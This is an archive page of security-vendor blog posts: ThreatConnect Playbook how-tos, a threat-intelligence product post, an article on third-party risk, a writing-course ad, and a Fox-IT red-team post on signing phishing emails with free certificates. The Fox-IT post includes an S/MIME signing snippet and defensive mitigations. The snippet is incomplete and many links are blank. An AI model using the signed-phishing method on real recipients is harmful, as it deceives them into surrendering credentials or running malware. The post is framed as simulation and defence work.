Category Archives: Blog

Playbook Fridays: How to Create a Playbook for the Non-Programmer

Playbooks for the Non-Programmer using what else, Star Wars

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

We've written lots of Playbook Friday posts. None, though, have explained how to do it if you're unfamiliar with how to create a Playbook in the first place. So, for those of you who might need the first step - or a refresher - read on...

Overview of APIs

An API (Application Programming Interface) is an interface provided by software services to developers that allows them to perform tasks and retrieve information. In simpler terms, an API is used by other software and a UI (User Interface) is used by humans. By using an API you have a way to automate things that users are doing manually, therefore introducing some time saving.

Retrieving data from an API

We're going to use the example of retrieving data from the publicly available Star Wars API (of course!). This API provides various data relating to the first seven Star Wars movies.

Building our Playbook

  1. Choose the data you want to retrieve

After reviewing the API documentation, we decide that we want to retrieve a list of film titles.

Star Wars API Documentation - Films. To retrieve a list of the films and their data, we have to make a call to When we do this, we receive a JSON formatted response. This is a human readable format that organizes information in two ways:

  • lists (or arrays);
  • dictionaries (or key-value pairs).

For more information on the JSON format and how it is used to structure data, see: REST API Tutorial: Introduction to JSON

When we request the films from the API, we get a list of different films, each described in the following format:


In the above format a title key and release_date which we'll use to display the name of each film in our Playbook as a campaign in the ThreatConnect UI.

  1. Querying the API in our Playbook

To query the API, we use the following steps in our Playbook:

  • HTTPLink Trigger - This is used as the item that starts the Playbook
  • HTTP Client - We will provide this with the URL of the StarWars API above

We will also loop the result back from the HTTP Client to the Trigger so that we can see the results.

When we execute this Playbook, the following is returned from the API - the raw JSON - looks like this:

This JSON response is difficult to read when returned from the API. Remember, this wasn't designed for a human to read or interact with so we have a few different ways to make this useable for now. The first option is a Chrome Extension - which will show a button to click in your browser to make this readable:

Another option is to paste it into a JSON formatter website such as

  • Copy the JSON text
  • Paste the JSON into the main editor window

Click the formatter icon at the top left.

3. Find the data you want to retrieve

We want to retrieve title of each movie. From the API response, we can see that:

  • there is a dictionary with a key called results;
  • the value of results is an array of films;
  • each film is its own dictionary or object; and
  • the name of the movie is stored under the title key in that dictionary.

For example:


"count": 7,

"next": null,

"previous": null,

"results": [


"title": "A New Hope",

"episode_id": 4,

We want to retrieve the title and release date for each film by using JMESPath to filter out the result set that we want.

To do this piece we'll need to use JMESPath or JSONPath. You can use either to do this but JMESPath is preferred over JSONPath and will be the one we use for this demonstration. Navigate in your browser to and paste in your JSON Content.

Since we know from the formatted output that the data we want is in the "results" dictionary, we put that into JMESPath's website:

So far so good; but not exactly what we are going for yet. We filter down further to just the titles and release date. Because this is a dictionary and we don't want to pull out a single item, but instead want every item in the dictionary, we have to put an empty open and close bracket [ ] to our query before we can filter further, like the below:

We can now target "title" like the below by specifying our query as "results[].title" and the release date with "results[].release_date".

4. Capture the data in Playbooks

Great! We have the titles and release date! Now let's modify our Playbook to capture this information. To do this, you'll need to add the Playbook app "JMESPath" into your Playbook:

Then in the "JSON Data" area,  pass in the HTTP Content:

Then in the "JMES Path StringArray Expression" area  input the query and assign it a "variable" or Key name such as "titles" and "release_dates":

5. Saving the data
Now let's save our extracted data as Campaigns!

This part is pretty simple. Add the step "Create ThreatConnect Campaign" and then there are two required fields, notated with "*" those are: "Campaign Name" and "First Seen".

Use "titles" and "release_dates" for each respectively.

6. Viewing the data
After a successful execution of the Playbook, you should now see the Campaigns (aka "titles") and their "creation date" inside of the Browse page in the source defined in the "Create ThreatConnect Campaign" step.

Congratulations! You're on your way to creating all the Playbooks!




























The post Playbook Fridays: How to Create a Playbook for the Non-Programmer appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

5 Reasons to Mark a False Positive in ThreatConnect

By taking an intelligence-driven approach, we can start to connect the dots in a more interesting fashion

ThreatConnect allows you to curate almost every facet of your intelligence -- including indicator reputation. One of the best ways you can help keep a tidy shop is to flag an indicator as a False Positive (FP) when you encounter it. Notionally we're all familiar with what this should do: it tells your colleagues (both human and software) that this indicator isn't actually a threat and can be skipped in your day-to-day analysis.

By taking an intelligence-driven approach however, we can start to connect the dots in a more interesting fashion. Beyond signaling your coworkers, flagging an indicator as a False Positive has some interesting and far-reaching implications. Read on to see what impact you can have across the world with a single button click!


1. Decrease in ThreatAssess Score

An indicator's ThreatAssess Score is greatly affected by the amount of False Positive reported.

Our ThreatAssess algorithm leverages input from users to fine-tune an indicator's reputation. The most immediate impact of clicking the False Positive button is that it will affect the score of an indicator. On a 1000-point scale, an indicator will drop as it continues to accrue FP votes. This will include votes within your organization, votes across organizations, and account for the age of votes over time!  The ThreatAssess score has an impact on how your team can quickly understand and triage indicators, and can also impact integrations downstream.


2. False Positive Filters

Quickly identify which indicators have had FP votes directly from the Browse screen.

As FP votes accumulate on an indicator, there are controls built across the platform to allow you to sort data accordingly. Since FP's are a valuable form of context around your intelligence, we want to make sure you can access it in meaningful ways that help you inform decisions:

  • Use filters on the Browse screen to remove indicators with FP votes and clean up your workflow
  • Create Dashboard cards to identify which feeds and data sources are resulting in high concentrations of FP's in your network
  • Leverage our API and integration-based filters to fine-tune your tolerance for suspected FP indicators across your ecosystem


3. Global CAL counts

Quickly determine how many FPs have been submitted and how many times an indicator has been observed by global CAL users.

If you're participating in ThreatConnect's CAL™ (Collective Analytics Layer), all of the FP votes on an indicator will be sent to be anonymized and aggregated. These totals are what drive the rows you see in the Analytics card on an indicator's Details Page. This provides valuable insight into how all analysts view an indicator. In addition to informing (and being informed) by your team, you can benefit from the analysis of the entire ThreatConnect user base.


4. Feed Evaluation

ThreatConnect's Intelligence Report Card helps you better understand and prioritize feeds.

CAL doesn't just count all of the FP votes, it puts them to work. One of CAL's key uses for FP votes is feed evaluation, in the form of Report Cards. If you're ever wondering which open source feeds to enable in your system, Report Cards are there to help! CAL computes key metrics of how each feed is performing across the ThreatConnect ecosystem, and your FP votes can help inform the Reliability Score of a feed. As I discussed in our blog post about Report Cards, Reliability Score is a measure of how many, and how egregious, the FP's are within a given feed. We're all familiar with the garbage in/garbage out problem, this is one of our best ways of identifying the big offenders!


5. CAL Analytics

Drill further down into additional CAL Insights

There are multiple other analytics that CAL runs based on FP votes, each of which could fill its own blog post. CAL incorporates FP votes at a fundamental level into things like indicator reputation, classification, indicator status, and more!  There's more to consider than just the number of FP votes, so CAL uses its massive dataset and computing power to weigh additional factors such as FP vote timeliness, consensus, and other things we find to be significant.

The more data CAL accumulates, the smarter these analytics get!


The post 5 Reasons to Mark a False Positive in ThreatConnect appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

In the 21st Century’s ‘Great Game,’ Third Party Risk Explodes

Third party risk explodes

The recent Shamoon attack on the Italian firm Saipem is a cautionary tale about the danger posed by metastasizing third party risks as the Internet becomes the stage for geopolitical power struggles.

By Paul F. Roberts

The Italian firm Saipem, which services the oil industry, was on the receiving end of a malware outbreak over the weekend of December 8, 2018, according to a company statement (PDF). The attack affected about 300 to 400 servers and 100 personal computers on the company’s corporate network, according to a report by Reuters.

While that might not be unusual, the malware used in the attack was. Analysis of the malicious file determined that it was a variant of the Shamoon malware, a destructive “wiper” program that has been linked to earlier attacks on oil firms in the Middle East including Saudi Aramco, a Saudi Arabian firm, and RasGas, headquartered in Qatar. In the case of the original Shamoon outbreak in 2012, the malware infected and erased data on some 30,000 systems on the Saudi Aramco network, forcing a months long recovery process at the firm. Shamoon popped up again in late 2016 in another round of attacks against oil firms in the Middle East- that attack was just ahead of a meeting of OPEC at which oil production cuts were to be introduced.

A friend of my enemy is…

Those earlier attacks and the Shamoon malware have been labeled “advanced persistent threat” (or APT) attacks and linked to hacking groups with ties to the Iranian government, a regional rival of Saudi Arabia. So why attack an Italian firm best known for deep sea oil drilling? There’s a three word answer: Third. Party. Risk. It turns out that one of Saipem’s biggest customers is – you guessed it – Saudi Aramco, a high profile target of the Shamoon APT group. In all likelihood, Saipem was not a direct target, so much as a vital link in Saudi Aramco’s supply chain that was also vulnerable to attack.

Welcome to the 21st Century’s equivalent of the “Great Game” – that (in)famous contest for geopolitical advantage between the British and Russian empires in the 19th century. Only these days, the theater of conflict and confrontation is not in the foothills of Afghanistan or Uzbekistan, but online: as the world’s great and emerging powers carry out operations with determination and – mostly – impunity all over the globe.

The Shamoon attack on Saipem shows how the growing clout and ambition of nation state actors online makes it more important than ever (and harder than ever) for organizations to understand the web of first-, second, and third party cyber risks they face.

Consider, for a moment, the long list of Fortune 500 firms affected by the NotPetya wiper malware, which appeared in June, 2017. Firms like Merck Pharmaceuticals, Federal Express, AP Moeller Maersk, the global shipping firm, and candy maker Modelez were crippled by the virulent malware, which erased the hard drives of systems it infected. Affected firms realized losses in the tens- and hundreds of millions of dollars. FedEx, alone, estimated its losses from NotPetya at $400 million.

What was their exposure? In many cases it was an obscure, Ukrainian financial software package known as MEDocs that provided the initial point of entry for NotPetya. In other cases, firms had yet to apply a patch for a critical vulnerability in Microsoft Windows that was exploited using an NSA-developed tool dubbed “EternalBlue.” While none of  the firms, themselves, were direct targets of the group behind the malware, they were all collateral damage in a long-running physical and cyber conflict between Ukraine and Russia.

Refiguring third party risk

But if the risk posed by third parties is growing more complex, is there anything companies can do to manage it? The short answer is, “Yes.”

Know your stuff

To start with, organizations of all sizes need a better grasp on the hardware, software, and services at use in their organization. Knowing what software and services are operating within your environment is the first and most important step to limiting your exposure to third party risk.

As the NotPetya incident indicates, even innocuous applications can become avenues for devastating attack. That’s especially true of cloud-based platforms that have blossomed in recent years, forming a kind of “shadow IT” deployment within your organization. Tools such as Slack,, and Dropbox are powerful collaboration and sharing tools, but they can also be weaponized by an enterprising external actor or a malicious insider. So know that they’re there, make sure they’re deployed securely, and have a plan to manage any risks they present.

Know your data

Knowing what sensitive data your company owns is just as important as knowing the IT assets in your environment. Stolen personally identifying information has monetary value on the cyber underground. Even absent financial data like credit card numbers and proprietary customer data could be used as part of identity theft schemes or a larger, nation state operation. (For example: Marriott’s stolen guest data is believed to have been stolen by Chinese government hackers and could be used to map the movement of persons of interest.) Your sensitive intellectual property could be stolen and used to give competitors a leg up on you in the marketplace. Do a data audit of both on premises and (increasingly) cloud environments to make sure you’ve accounted for any sensitive and (especially) regulated data, then make sure you have adequate safeguards protecting that data, including encryption for data at rest and in transit, strict user access controls, adequate logging, and so on.

Put a human in the loop

Speaking of “managing the risks” of third party software and services: one recurrent theme in recent vendor compromise stories is the decision by downstream software users to enable automatic update or configuration features. In the case of NotPetya, sophisticated attackers were able to compromise the parent company MeDoc and disguise the malware as a signed software update. Companies that had configured their software to automatically download and install that update were infected. Organizations that didn’t enable the automatic update didn’t. Put a human in the loop for software updates and other changes so you don’t get caught off-guard.

Accept what you don’t know

Ultimately, you won’t always have direct visibility into all your nth-party risks. That’s why it is important to seek the counsel of those who can provide you insights into your most pressing risks and also notify you to unseen threats and dangers. Third party risk scorecards might help you grasp your security posture at a single moment in time, but that doesn’t address the bigger issue – alerting of dynamic and evolving risks or threats. That’s only something a continuous monitoring solution can offer.

If the events of the last two years have taught us anything, it’s that third party risk is real and growing, and no organization is perfect at combatting it. However, the process becomes more manageable by partnering with organizations that have the tools and services that can control third party risk in a comprehensive way: by continuously monitoring third party hardware, software, and service providers for the presence of malicious threats and other Indicators of Compromise (IOCs).

Third party threat monitoring isn’t a panacea. It won’t solve your digital risk problem alone. But it is something that every company has to make a priority – or be prepared to pay the price!

The post In the 21st Century’s ‘Great Game,’ Third Party Risk Explodes appeared first on LookingGlass Cyber Solutions Inc..

A Short Cybersecurity Writing Course Just for You

My new writing course for cybersecurity professionals teaches how to write better reports, emails, and other content we regularly create. It captures my experience of writing in the field for over two decades and incorporates insights from other community members. It’s a course I wish I could’ve attended when I needed to improve my own security writing skills.

I titled the course The Secrets to Successful Cybersecurity Writing: Hack the Reader. Why “hack”? Because strong writers know how to find an opening to their readers’ hearts and minds. This course explains how you can break down your readers’ defenses, and capture their attention to deliver your message—even if they’re too busy or indifferent to others’ writing.

Here are several examples of such “hacking” techniques from course sections that focus on the structure and look of successful security writing:

  • Headings: Use them to sneak in the gist of your message, so your can persuade your readers even if they don’t read the rest of your text.
  • Lists: Rely on them to capture your readers’ attention when they skim your message for key ideas.
  • Figure Captions: Include them to influence the conclusion your readers reach even if they only glance at the graphic. 

This is an unusual opportunity to improve your writing skills without sitting through tedious lectures or writing irrelevant essays. Instead, you’ll make your writing remarkable by learning how to avoid common pitfalls.

For instance, this slide opens the discussion about expressing ideas clearly, concisely, and correctly:

This course is grounded in the idea that you can become a better writer by learning how to spot common problems in others’ writing. This is why the many examples are filled with delightful errors that are as much fun to find as they are to correct.

One of the practical takeaways from the course is a set of checklists you can use to eliminate issues related to your structure, look, words, tone, and information. For example:

The course will help you stand out from other cybersecurity professionals with similar technical skills. It will help you get your executives, clients, and colleagues to notice your contribution, accept your advice, and appreciate your input. You’ll benefit whether you are:

  • A manager or an individual team member
  • A consultant or an internally-focused employee
  • A defender or an attacker
  • An earthling or an alien

You have a limited opportunity to attend a beta version of the course. You will not only get an early adopter discount and bragging rights, but also shape the course for future participants. I’ll teach the 1st beta in Orlando in April 2019—registration is now open. I’ll present the 2nd beta in New York City in June 2019. Starting around September 2019 you’ll be able to take the course almost exclusively online via the SANS OnDemand platform.

If you want me to notify you when the registration for the registration for the 2nd beta opens or when the OnDemand version of the course launches, just drop me a note.

Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario which looks credible enough to persuade the target to perform a certain action like opening an attachment or clicking on a link in the email. To avoid such attacks the IT or security team will tell users to check for certain things to avoid falling for these phishing emails. One of the recommendations is to check if the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks; so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same; we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…
To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia

This means that an email originating from the domain “ ”, may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain “ ” was not sent by the email server specified in the SPF record, the email message can be flagged as SPAM. By using SPF records you know that the email was sent by an authorized email server, SPF records however, do not disclose the authenticity of the sender. If a company has configured their SMTP server as an open relay server, users can send mail on another user’s behalf which will pass the SPF record check on the receivers end. There are other measures that can be used to identify legitimate mail servers to reduce phishing attacks, such as DKIM and DMARC, however, these are beyond the scope of this blogpost.

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.
For now we’ll focus on the aspect of validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (i.e.: “ “). The client will check if this matches the originating email-address. To verify the authenticity of the digital signature, the email client will also check if the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed using a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.


By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (i.e.: “ “) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.
Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.


Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true, if sends you a signed email with a valid certificate: the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But, if (notice the ‘.cm’ instead of ‘.com’) sends you a signed email with a valid certificate, that person can still be anyone. As long as that person has control over the domain ‘’, they will be able to send signed emails from that domain. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard if they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our client’s employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we setup a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:


This is not limited to Office Outlook only, it is working in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn’t have a red rosette to show the user that an email is digitally signed, there are some indicators which are present when reading a signed email. As you can see below, the digital signature does still add to the legitimate look of the phishing emails:


Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail. Since the Dutch government has a webpage1 with information about the use of electronic signatures in email, we can write a paragraph that looks something like the the one in the image below.


Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from M2Crypto library
from M2Crypto import bio, rand, smime

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG.
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; set it up; sign the buffer.
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format.
out = BIO.MemoryBuffer()
out.write('From: %s\n' % sender)
out.write('To: %s\n' % target)
out.write('Subject: %s\n' % subject)

s.write(out, p7, buf)
msg =

# Save the PRNG's state.

This code originates from the Python M2Crypto documentation2

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick google query for “free email certificate” should give you enough results to start requesting your own certificate. If you have access to an inbox you’re good to go.
To get an idea of how the above code snippet can be included in a standalone script, we’d like to refer to Fox-IT’s Github page where we’ve uploaded an example script which takes the most basic email parameters (‘from’, ‘to’, ‘subject’ and ‘body’). Don’t forget to place the required certificate and corresponding key file in the same directory with the Python script if you start playing around with the example script. Link to project on GitHub:


There are some mitigations that can make this type of attack harder to perform for an attacker. We’d like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name that is similar to your own domain name can trick users into executing malware or giving away their credentials more easily. This type of attack is called domain squatting, which can result in examples like instead of . There are generators that can help you with that, such as:

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server in an organisation for maintaining integrity and secrecy. All non-public certificates will stem from this server. Most organizations choose to completely isolate their root CA for that reason and use another server, the subordinate CA, to sign certificate requests; The subordinate CA will sign certificates on behalf of the root CA.
In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU from all certification authorities, except from our own root and subordinate CA, phishing mail that is signed with a valid certificate signed by a third party CA, will still trigger a warning stating that the certificate is invalid.
To do that, we must first discover all certificates that support the secure email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email
Get-ChildItem -Path 'Cert:\' -Recurse | Where-Object {$_.GetType().Name -eq 'X509Certificate2' -and ({$_.EnhancedKeyUsageList.Count -eq 0} -or $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')} | Select-Object PSParentPath, Subject

We now know which certificates support the secure email EKU. In order to disable to secure email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, select Certificates
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificates stores must be edited.

    1. Check if intended purpose states Secure email or All
  4. Open the properties of a certificate and click the details tab

If the intended purpose at step 3.1 stated All,
1. Click Key Usage, followed by Edit Properties.
2. Click Enable only the following purposes and uncheck the Secure Email checkbox

If the intended purpose at step 3a stated Secure Email,
1. Click Enhanded key usage (property)
2. Click Edit Properties…
3. Uncheck the Secure Email checkbox

Please keep the following in mind when implementing these mitigations:
* When a legitimate mail has been signed with with a certificate issues by a CA that of which the Secure Email EKU has been removed, the certificate of the email will not be trusted by Windows
* Changing the EKU may have an impact on the working of your systems
* These settings can be reverted with every update in Windows
* New or renewed certificates can have the Secure email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post it becomes more and more obvious that users will never be able to withstand social engineering attacks. In a best case scenario, users will detect and report an attack, in a worst case scenario your users will become victim. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always become a victim. This means that we (organizations) need to start thinking about new and more user friendly strategies in combating these type of attacks.

To summerize this blogpost:
* An email coming from a domain does not prove the integrity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* If the domain of the sender address is correct and the email has been signed with a valid certificate signed by a trusted CA, only then the email can be trusted.


1: (Dutch)
2: “M2Crypto S/MIME”

Playbook Fridays: Github Activity Monitor

This Playbook is designed to automate the monitoring and alerting of Github activity for a given user

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Many malicious actors, from unsophisticated defacers to sophisticated actors, use Github to develop and/or serve malicious content. This is largely because Github offers version control  and Github Pages for automatically deploying content.

With so much diverse, malicious activity on Github, it is important to be able to track the changes on a malicious code repository. This Playbook is designed to automate the monitoring and alerting of Github activity for a given user. In this way, you can get alerts whenever a github user does a public action.

This Playbook is based on the Page Monitor.pbx Playbook described here: . It is designed to be run once a week and uses Github's public API to check if there is any new activity. If there is new content, it sends an alert (in this case via slack).

Installing the Playbook

To install the Playbook, download the Github Activity Monitor.pbx Playbook and install it in ThreatConnect from the Playbooks page. Once it is installed, start by editing the "Set Variables" app (the Playbook app right after the trigger). You will need to provide the "slackChannel" variable to which messages will be sent and the "githubUserName" variable you would like to monitor. Now, there are a few other apps which need some credentials and other information. The best way to find which apps still need updated is to try to turn the Playbook on which will provide you a list of apps that still need modified. Among the apps that need edited are the slack apps and the datastore apps.

But what if you don't use Slack? Easy: the Slack apps can be replaced with an app to send an email, create a task in ThreatConnect, or create a Jira issue (among other options). If you have any questions or run into any problems with anything mentioned in this blog, please raise an issue in Github! If you would like to have your app or playbook featured in a Playbook Friday blog post, submit it to our Playbook repository (there are instructions here:







The post Playbook Fridays: Github Activity Monitor appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: WhatCMS API Playbook

Detect a website's content management system (CMS)

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Determining the CMS (Content Management System) being used by a particular website is an important part of incident response and threat hunting. Incident responders are concerned with what CMS is being used because this gives clues into why a compromised site has been compromised. Certain CMSs are vulnerable in specific ways and identifying the CMS used on a site is a good place to start when investigating a compromised site. Knowing the CMS is also helpful when threat hunting as the directory structure of a site differs depending on the CMS. If an analyst is hunting for phishing or malware kits that have been installed on a site, knowing where to look decreases the time it may take to hunt for kits.

This Playbook makes it easy to find a website's CMS using the WhatCMS API, saving time and effort. This playbook is triggered by a User Action trigger which shows up for URL, Host, and Address indicators. If one wants to determine the CMS in use by a website, just click the "Detect CMS" user action button. If the WhatCMS API returns successful results, a tag and an attribute with the name of the CMS will be applied to the indicator. The tooltip that appears once the process is complete also includes a link to refresh the indicator's details page so that the user is able to view the new enrichment.

Installing the Playbook

To install the playbook, download WhatCMS_ Detect CMS of Website.pbx from our github repository ( Then import it into ThreatConnect from the "Playbooks" page. When importing the app, you will be asked to provide your WhatCMS API key (for which you can register here). This will be stored in ThreatConnect as a Keychain variable and can be used in other ThreatConnect apps and playbooks (you can read more about variables in section 5 here).

Once you have installed the playbook, it would be helpful to walk through the playbook as done in the video below, so you can get an idea of what the playbook does.

The post Playbook Fridays: WhatCMS API Playbook appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: OneMillion API Component

Using this Playbook Component, incident responders and analysts can check if a given domain exists on any lists of the most frequently visited hostnames

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.


This week, we are featuring a Playbook Component which finds the rank of a given host in a list of the one million, most visited hostnames. In this post, we are going to introduce why this component is useful, discuss why it is a Playbook Component rather than a Playbook, and show you how to use this component (if you have Playbooks enabled in your ThreatConnect instance, you can create a Playbook to use this component in less than five minutes).


If a Host Indicator is one of the top million, most visited domains, this usually merits further investigation. It could be that a host in the list is benign (perhaps it is a false positive or perhaps a malware sample calls back to a benign host to test its internet connection or get its IP address). It could alternatively mean that the host is malicious and simply getting a lot of traffic. Either way, it's helpful to have this information. This Playbook Component, built on the OneMillion API (which is not maintained by ThreatConnect), allows incident responders and analysts to check if a given domain exists on any lists of the most frequently visited hostnames.

Why a component?

Before we talk about how to use this component, let's address why this system was created as a Playbook Component rather than normal Playbook. The major benefit of components is that you can capture a common process you would like to repeat in multiple, diverse places. For example, if you are making a Playbook which requires you to get the length of a string, you could add apps to get the length of a string to that Playbook, but if you ever need to get the length of a string again, you will have to recreate what you have already done. Instead, if you are creating a generic function or one that you would like to use in multiple playbooks, consider creating a component. A component lets you perform an operation again and again without having to recreate anything (and by the way, there is a component to get the length of a string described here (this site is not maintained by ThreatConnect)). In the case of the OneMillion API Component, it was created as a component so that it is easy to plug into new and existing playbooks.

Using the component

So how do you use this component? In this section, we'll walk through the installation of the component and will create a Playbook to use the component to show you how easy it is to use components to expand the functionality of a Playbook.

  1. The first step is to install the component. You can download it from (which is not maintained by ThreatConnect) or download the "Query OneMillion API.pbx" file from GitHub.
  2. Once you have downloaded the component, you can import it into ThreatConnect like a Playbook by going to the "Playbooks" tab in ThreatConnect and clicking "New" > "Import" (on ThreatConnect versions before 5.7, you can click the "Import" button). Then import the Query OneMillion API.pbx file.
  3. Turn it on and the component is ready to be used!
  4. Now that we have installed and activated the "Query OneMillion API" component, we need to create a Playbook to use it. To do this, go back to the "Playbooks" tab in ThreatConnect and create a new Playbook. For this example, we are going to create a Playbook with a User Action trigger that will allow users to submit a host indicator in ThreatConnect to the OneMillion API and return the result with a single click.
  5. To build this Playbook, select the "Trigger" tab in the pane on the left and select "UserAction". This will add the trigger to the design canvas. Now, double click on the new trigger to edit it. Rename the trigger in the "User Action Name" field (this name will show up for users when viewing Host indicators in ThreatConnect). Select "Host" for the "Type" field, click through the next section, and save the trigger.
  6. Now, click the "App" tab in the pane on the left and select the "Query OneMillion API" from the "Components" section. If it does not show up, this is probably the "Query OneMillion API" component you installed in step two is not turned on (as we did in step three). Assuming, you were able to find the "Query OneMillion API" component and add it to the design canvas, drag a line from the blue dot on the trigger to the component. Double click on the component to edit it. In the "Host" field, start typing "#" and a list of available options will show up. Select "trg.action.item" (this is the hostname which is captured by the User Action trigger); this means that the hostname from which the Playbook was triggered will be sent to the OneMillion API (if this doesn't make sense, watch the gif above for a demo that will clarify how this system works). Save the "Query OneMillion API" component.
